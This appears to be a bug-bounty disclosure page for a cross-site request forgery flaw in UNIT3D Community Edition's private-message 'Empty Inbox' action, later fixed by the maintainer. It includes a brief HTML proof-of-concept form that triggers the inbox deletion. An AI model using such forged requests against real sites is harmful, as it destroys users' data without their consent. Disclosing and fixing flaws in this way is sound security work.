Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition

Valid

Reported on

Oct 9th 2021

Description

There is a CSRF vulnerability on Empty Inbox in Private Messages inbox.

Proof of Concept

//POC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://unit3d.site/mail/empty-inbox">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Occurrences

inbox.blade.php L39

We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back a year ago

HDVinnie validated this vulnerability a year ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

HDVinnie marked this as fixed with commit 63ae97 a year ago

HDVinnie has been awarded the fix bounty

This vulnerability will not receive a CVE

inbox.blade.php#L39 has been validated

amammad

commented a year ago

Researcher

hey maintainer

can i ask you to increase the bounty please?

to join this conversation